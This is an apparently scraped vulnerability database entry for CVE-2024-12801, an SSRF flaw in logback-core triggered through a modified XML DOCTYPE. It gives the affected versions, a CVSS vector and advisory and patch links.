CVE-2024-12801
EPSS 0.06%QOS.CH logback-core Server-Side Request Forgery vulnerability
發布日:2024/12/19修改日:2026/4/28
描述
Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH logback version 0.1 to 1.3.14 and 1.4.0 to 1.5.12 on the Java platform, allows an attacker to forge requests by compromising logback configuration files in XML. The attacks involves the modification of DOCTYPE declaration in XML configuration files.
受影響套件(2)
- Debian/logbackfrom 0
- Maven/ch.qos.logback:logback-core>= 1.4.0, < 1.5.13
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:L/SC:H/SI:H/SA:H/V:D/U:Clear |
參考連結(6)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-12801
- ADVISORYhttps://security-tracker.debian.org/tracker/CVE-2024-12801
- PATCHhttps://github.com/qos-ch/logback
- WEBhttps://github.com/qos-ch/logback/commit/5f05041cba4c4ac0a62748c5c527a2da48999f2d
- WEBhttps://logback.qos.ch/news.html#1.3.15
- WEBhttps://logback.qos.ch/news.html#1.5.13